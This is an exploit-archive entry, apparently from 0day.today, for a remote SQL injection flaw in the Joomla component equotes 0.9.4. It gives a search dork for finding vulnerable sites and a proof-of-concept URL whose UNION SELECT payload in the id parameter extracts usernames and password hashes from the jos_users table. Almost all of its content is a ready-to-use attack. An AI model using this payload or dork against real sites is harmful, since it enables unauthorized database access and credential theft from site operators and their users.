id: 3107
date: 06/01/2008
title: Joomla Component equotes 0.9.4 Remote SQL injection Vulnerability
author: His0k4
cves: 

=================================================================
Joomla Component equotes 0.9.4 Remote SQL injection Vulnerability
=================================================================



/---------------------------------------------------------------\
\                                				/
/        Joomla Component equotes  Remote SQL injection         \
\                                				/
\---------------------------------------------------------------/


[*] Author    :  His0k4 [ALGERIAN HaCkEr]

[*] Dork      :  inurl:com_eQuotes

[*] POC        : http://localhost/[Joomla_Path]/index.php?option=com_equotes&id={SQL}

[*] Example    : http://localhost/[Joomla_Path]/index.php?option=com_equotes&id=13 and 1=1 union select user(),concat(username,0x3a,password),user(),user(),user(),user(),user() FROM jos_users--

                
----------------------------------------------------------------------------



#  0day.today [2023-03-26]  #